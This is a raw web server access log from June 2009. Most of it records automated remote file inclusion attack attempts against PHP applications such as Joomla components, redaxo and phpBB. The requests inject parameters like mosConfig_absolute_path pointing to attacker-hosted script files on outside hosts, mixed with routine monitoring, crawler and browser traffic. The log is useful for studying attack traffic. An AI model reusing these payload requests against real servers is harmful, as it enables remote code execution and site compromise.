212.88.179.68 - - [22/Jun/2009:06:19:01 -0400] "GET //include/footer.php?_path[counter]=http://www.egile.lt/images/id.txt?? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
212.88.179.68 - - [22/Jun/2009:06:19:02 -0400] "GET /logs//include/footer.php?_path[counter]=http://www.egile.lt/images/id.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
74.53.70.114 - - [22/Jun/2009:06:19:15 -0400] "GET /logs/access_log.Q109051700%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
212.88.179.68 - - [22/Jun/2009:06:19:46 -0400] "GET /logs/error_log.Q109052800//include/footer.php?_path[counter]=http://www.egile.lt/images/id.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
209.51.133.202 - - [22/Jun/2009:06:19:47 -0400] "GET /logs//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:06:19:47 -0400] "GET //redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:06:19:47 -0400] "GET /logs/access_log.Q109053100//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:06:19:48 -0400] "GET /logs/access_log.Q109052600//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:06:19:51 -0400] "GET /logs/access_log.Q109061300%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:06:19:59 -0400] "GET /logs/access_log.Q109060700%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:06:21:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.53.70.114 - - [22/Jun/2009:06:21:10 -0400] "GET /logs/access_log.Q109051100//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:06:21:32 -0400] "GET /logs/access_log.Q109052800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:06:21:33 -0400] "GET /logs/access_log.Q109053100%20%20//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:06:21:33 -0400] "GET /logs/access_log.Q109052600%20%20//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
210.115.58.73 - - [22/Jun/2009:06:22:07 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
210.115.58.73 - - [22/Jun/2009:06:22:07 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
210.115.58.73 - - [22/Jun/2009:06:22:12 -0400] "GET /logs/access_log.Q109051500//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
210.115.58.73 - - [22/Jun/2009:06:22:12 -0400] "GET /logs/access_log.Q109060600//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
210.115.58.73 - - [22/Jun/2009:06:22:15 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
210.115.58.73 - - [22/Jun/2009:06:22:15 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
210.115.58.73 - - [22/Jun/2009:06:22:15 -0400] "GET /logs/access_log.Q109060600//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
210.115.58.73 - - [22/Jun/2009:06:22:15 -0400] "GET /logs/access_log.Q109051500//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.239.227.229 - - [22/Jun/2009:06:22:31 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt?? HTTP/1.1" 200 453 "-" "libwww-perl/5.79"
222.239.227.229 - - [22/Jun/2009:06:23:02 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt?? HTTP/1.1" 200 453 "-" "libwww-perl/5.79"
222.239.227.229 - - [22/Jun/2009:06:23:26 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt?? HTTP/1.1" 200 453 "-" "libwww-perl/5.79"
222.239.227.229 - - [22/Jun/2009:06:23:46 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt?? HTTP/1.1" 200 453 "-" "libwww-perl/5.79"
217.147.29.190 - - [22/Jun/2009:06:24:19 -0400] "GET //addevent.inc.php?agendax_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
217.147.29.190 - - [22/Jun/2009:06:24:19 -0400] "GET /logs//addevent.inc.php?agendax_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
217.147.29.190 - - [22/Jun/2009:06:24:21 -0400] "GET /logs/access_log.Q109061800//addevent.inc.php?agendax_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
217.147.29.190 - - [22/Jun/2009:06:25:14 -0400] "GET /logs/access_log.Q109052000//addevent.inc.php?agendax_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
222.239.227.229 - - [22/Jun/2009:06:25:27 -0400] "GET /logs/access_log.Q109052400///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
222.239.227.229 - - [22/Jun/2009:06:25:28 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt?? HTTP/1.1" 200 453 "-" "libwww-perl/5.79"
222.239.227.229 - - [22/Jun/2009:06:25:29 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt?? HTTP/1.1" 200 6516 "-" "libwww-perl/5.79"
209.59.12.99 - - [22/Jun/2009:06:26:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.160.79.161 - - [22/Jun/2009:06:26:53 -0400] "GET /logs//components/com_fabrik/fabrik_validation.class.php?mosConfig_absolute_path=http://www.petitbijouonline.com/lib/idfx1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
217.160.79.161 - - [22/Jun/2009:06:26:53 -0400] "GET //components/com_fabrik/fabrik_validation.class.php?mosConfig_absolute_path=http://www.petitbijouonline.com/lib/idfx1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
172.16.1.180 - - [22/Jun/2009:06:26:57 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [22/Jun/2009:06:26:57 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [22/Jun/2009:06:26:57 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
217.160.79.161 - - [22/Jun/2009:06:27:01 -0400] "GET /logs/access_log.Q109061000%20%20//components/com_fabrik/fabrik_validation.class.php?mosConfig_absolute_path=http://www.petitbijouonline.com/lib/idfx1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
222.239.227.229 - - [22/Jun/2009:06:27:05 -0400] "GET /logs/access_log.Q109052400///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
222.162.115.67 - - [22/Jun/2009:06:27:05 -0400] "GET /popup.php?path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
222.239.227.229 - - [22/Jun/2009:06:27:05 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt?? HTTP/1.1" 200 453 "-" "libwww-perl/5.79"
222.162.115.67 - - [22/Jun/2009:06:27:05 -0400] "GET /logs/popup.php?path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
222.162.115.67 - - [22/Jun/2009:06:27:05 -0400] "GET /logs/access_log.Q109060400/popup.php?path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.239.227.229 - - [22/Jun/2009:06:27:06 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt?? HTTP/1.1" 200 6516 "-" "libwww-perl/5.79"
217.160.79.161 - - [22/Jun/2009:06:27:08 -0400] "GET /logs/access_log.Q109061000%20%20//components/com_fabrik/fabrik_validation.class.php?mosConfig_absolute_path=http://www.petitbijouonline.com/lib/idfx1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
217.160.79.161 - - [22/Jun/2009:06:27:08 -0400] "GET /logs//components/com_fabrik/fabrik_validation.class.php?mosConfig_absolute_path=http://www.petitbijouonline.com/lib/idfx1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
217.160.79.161 - - [22/Jun/2009:06:27:08 -0400] "GET //components/com_fabrik/fabrik_validation.class.php?mosConfig_absolute_path=http://www.petitbijouonline.com/lib/idfx1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
94.23.200.54 - - [22/Jun/2009:06:27:09 -0400] "GET //?custompluginfile[]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
94.23.200.54 - - [22/Jun/2009:06:27:09 -0400] "GET //?custompluginfile[]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
94.23.200.54 - - [22/Jun/2009:06:27:09 -0400] "GET /logs//?custompluginfile[]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 200 6515 "-" "Mozilla/5.0"
94.23.200.54 - - [22/Jun/2009:06:27:09 -0400] "GET /logs/access_log.Q109051200//?custompluginfile[]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
94.23.200.54 - - [22/Jun/2009:06:27:09 -0400] "GET /logs//?custompluginfile[]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 200 6515 "-" "Mozilla/5.0"
94.23.200.54 - - [22/Jun/2009:06:27:09 -0400] "GET /logs/access_log.Q109051200//?custompluginfile[]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
222.162.115.67 - - [22/Jun/2009:06:27:10 -0400] "GET /popup.php?path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
222.162.115.67 - - [22/Jun/2009:06:27:10 -0400] "GET /logs/popup.php?path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
222.162.115.67 - - [22/Jun/2009:06:27:10 -0400] "GET /logs/access_log.Q109060400/popup.php?path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
94.23.200.54 - - [22/Jun/2009:06:27:28 -0400] "GET /logs/access_log.Q109051500//?custompluginfile[]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
94.23.200.54 - - [22/Jun/2009:06:27:31 -0400] "GET /logs/access_log.Q109051500//?custompluginfile[]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
217.160.79.161 - - [22/Jun/2009:06:27:35 -0400] "GET /logs/access_log.Q109061000//components/com_fabrik/fabrik_validation.class.php?mosConfig_absolute_path=http://www.petitbijouonline.com/lib/idfx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
222.162.115.67 - - [22/Jun/2009:06:27:37 -0400] "GET /logs/access_log.Q109053000/popup.php?path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.162.115.67 - - [22/Jun/2009:06:27:42 -0400] "GET /logs/access_log.Q109053000/popup.php?path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
172.16.1.180 - - [22/Jun/2009:06:27:59 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [22/Jun/2009:06:27:59 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [22/Jun/2009:06:27:59 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
217.147.29.190 - - [22/Jun/2009:06:28:37 -0400] "GET /logs/access_log.Q109061800%20%20//addevent.inc.php?agendax_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
217.147.29.190 - - [22/Jun/2009:06:28:44 -0400] "GET /logs/access_log.Q109052000%20%20//addevent.inc.php?agendax_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
155.212.232.66 - - [22/Jun/2009:06:28:52 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
155.212.232.66 - - [22/Jun/2009:06:28:52 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
155.212.232.66 - - [22/Jun/2009:06:28:53 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
155.212.232.66 - - [22/Jun/2009:06:28:53 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
82.194.87.219 - - [22/Jun/2009:06:29:05 -0400] "GET /logs//includes/messages.inc.php?include_path=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 229 "-" "libwww-perl/5.822"
94.23.200.54 - - [22/Jun/2009:06:29:20 -0400] "GET /logs/access_log.Q109051200%20%20//?custompluginfile[]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
94.23.200.54 - - [22/Jun/2009:06:29:22 -0400] "GET /logs/access_log.Q109051200%20%20//?custompluginfile[]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
94.23.200.54 - - [22/Jun/2009:06:29:26 -0400] "GET /logs/access_log.Q109051500%20%20//?custompluginfile[]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
94.23.200.54 - - [22/Jun/2009:06:29:27 -0400] "GET /logs/access_log.Q109051500%20%20//?custompluginfile[]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:06:31:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
94.23.200.54 - - [22/Jun/2009:06:33:17 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
94.23.200.54 - - [22/Jun/2009:06:33:17 -0400] "GET /logs/access_log.Q109050800/?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
94.23.200.54 - - [22/Jun/2009:06:33:17 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 200 6510 "-" "Mozilla/5.0"
94.23.200.54 - - [22/Jun/2009:06:33:23 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
94.23.200.54 - - [22/Jun/2009:06:33:23 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 200 6510 "-" "Mozilla/5.0"
94.23.200.54 - - [22/Jun/2009:06:33:23 -0400] "GET /logs/access_log.Q109050800/?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
84.201.208.50 - - [22/Jun/2009:06:33:25 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
84.201.208.50 - - [22/Jun/2009:06:33:25 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
84.201.208.50 - - [22/Jun/2009:06:33:25 -0400] "GET /logs/access_log.Q109051100%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
88.84.128.40 - - [22/Jun/2009:06:33:33 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
88.84.128.40 - - [22/Jun/2009:06:33:33 -0400] "GET /logs/access_log.Q109051100%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
88.84.128.40 - - [22/Jun/2009:06:33:33 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
66.249.71.14 - - [22/Jun/2009:06:34:06 -0400] "GET /images/download_CD_lg.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
66.249.71.14 - - [22/Jun/2009:06:34:40 -0400] "GET /logs/access_log.Q108091000 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
83.16.182.130 - - [22/Jun/2009:06:34:53 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
83.16.182.130 - - [22/Jun/2009:06:34:53 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
83.16.182.130 - - [22/Jun/2009:06:34:53 -0400] "GET /logs/access_log.Q109051100%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:06:36:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
94.23.200.54 - - [22/Jun/2009:06:36:33 -0400] "GET /logs/access_log.Q109050800%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
94.23.200.54 - - [22/Jun/2009:06:36:42 -0400] "GET /logs/access_log.Q109050800%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
94.23.200.54 - - [22/Jun/2009:06:37:02 -0400] "GET /logs/access_log.Q109051300%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
222.239.227.229 - - [22/Jun/2009:06:37:05 -0400] "GET /logs/access_log.Q109060200///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
222.239.227.229 - - [22/Jun/2009:06:37:06 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt?? HTTP/1.1" 200 453 "-" "libwww-perl/5.79"
222.239.227.229 - - [22/Jun/2009:06:37:06 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt?? HTTP/1.1" 200 6516 "-" "libwww-perl/5.79"
94.23.200.54 - - [22/Jun/2009:06:37:09 -0400] "GET /logs/access_log.Q109051300%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
172.16.1.180 - - [22/Jun/2009:06:37:17 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [22/Jun/2009:06:37:17 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [22/Jun/2009:06:37:17 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
222.239.227.229 - - [22/Jun/2009:06:37:23 -0400] "GET /logs/access_log.Q109060400///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
172.16.1.180 - - [22/Jun/2009:06:38:19 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [22/Jun/2009:06:38:19 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [22/Jun/2009:06:38:19 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [22/Jun/2009:06:39:23 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [22/Jun/2009:06:39:23 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [22/Jun/2009:06:39:23 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
222.239.227.229 - - [22/Jun/2009:06:39:36 -0400] "GET /logs/error_log.Q108040600///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
217.160.79.161 - - [22/Jun/2009:06:39:42 -0400] "GET //components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://www.petitbijouonline.com/lib/idfx1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
217.160.79.161 - - [22/Jun/2009:06:39:42 -0400] "GET /logs//components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://www.petitbijouonline.com/lib/idfx1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
217.160.79.161 - - [22/Jun/2009:06:39:42 -0400] "GET /logs/access_log.Q109051300//components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://www.petitbijouonline.com/lib/idfx1.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
222.239.227.229 - - [22/Jun/2009:06:39:50 -0400] "GET /logs/access_log.Q109060400///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
222.239.227.229 - - [22/Jun/2009:06:40:40 -0400] "GET /logs/access_log.Q109060200///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
172.16.1.180 - - [22/Jun/2009:06:40:40 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [22/Jun/2009:06:40:40 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [22/Jun/2009:06:40:40 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
222.239.227.229 - - [22/Jun/2009:06:40:41 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt?? HTTP/1.1" 200 453 "-" "libwww-perl/5.79"
222.239.227.229 - - [22/Jun/2009:06:40:42 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt?? HTTP/1.1" 200 6516 "-" "libwww-perl/5.79"
222.239.227.229 - - [22/Jun/2009:06:40:56 -0400] "GET /logs/error_log.Q109060200///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
209.59.12.99 - - [22/Jun/2009:06:41:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.160.79.161 - - [22/Jun/2009:06:41:12 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://www.petitbijouonline.com/lib/idfx1.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
66.249.71.54 - - [22/Jun/2009:06:41:41 -0400] "GET /images/over-index_bonemillsr.jpg HTTP/1.1" 200 2812 "-" "Googlebot-Image/1.0"
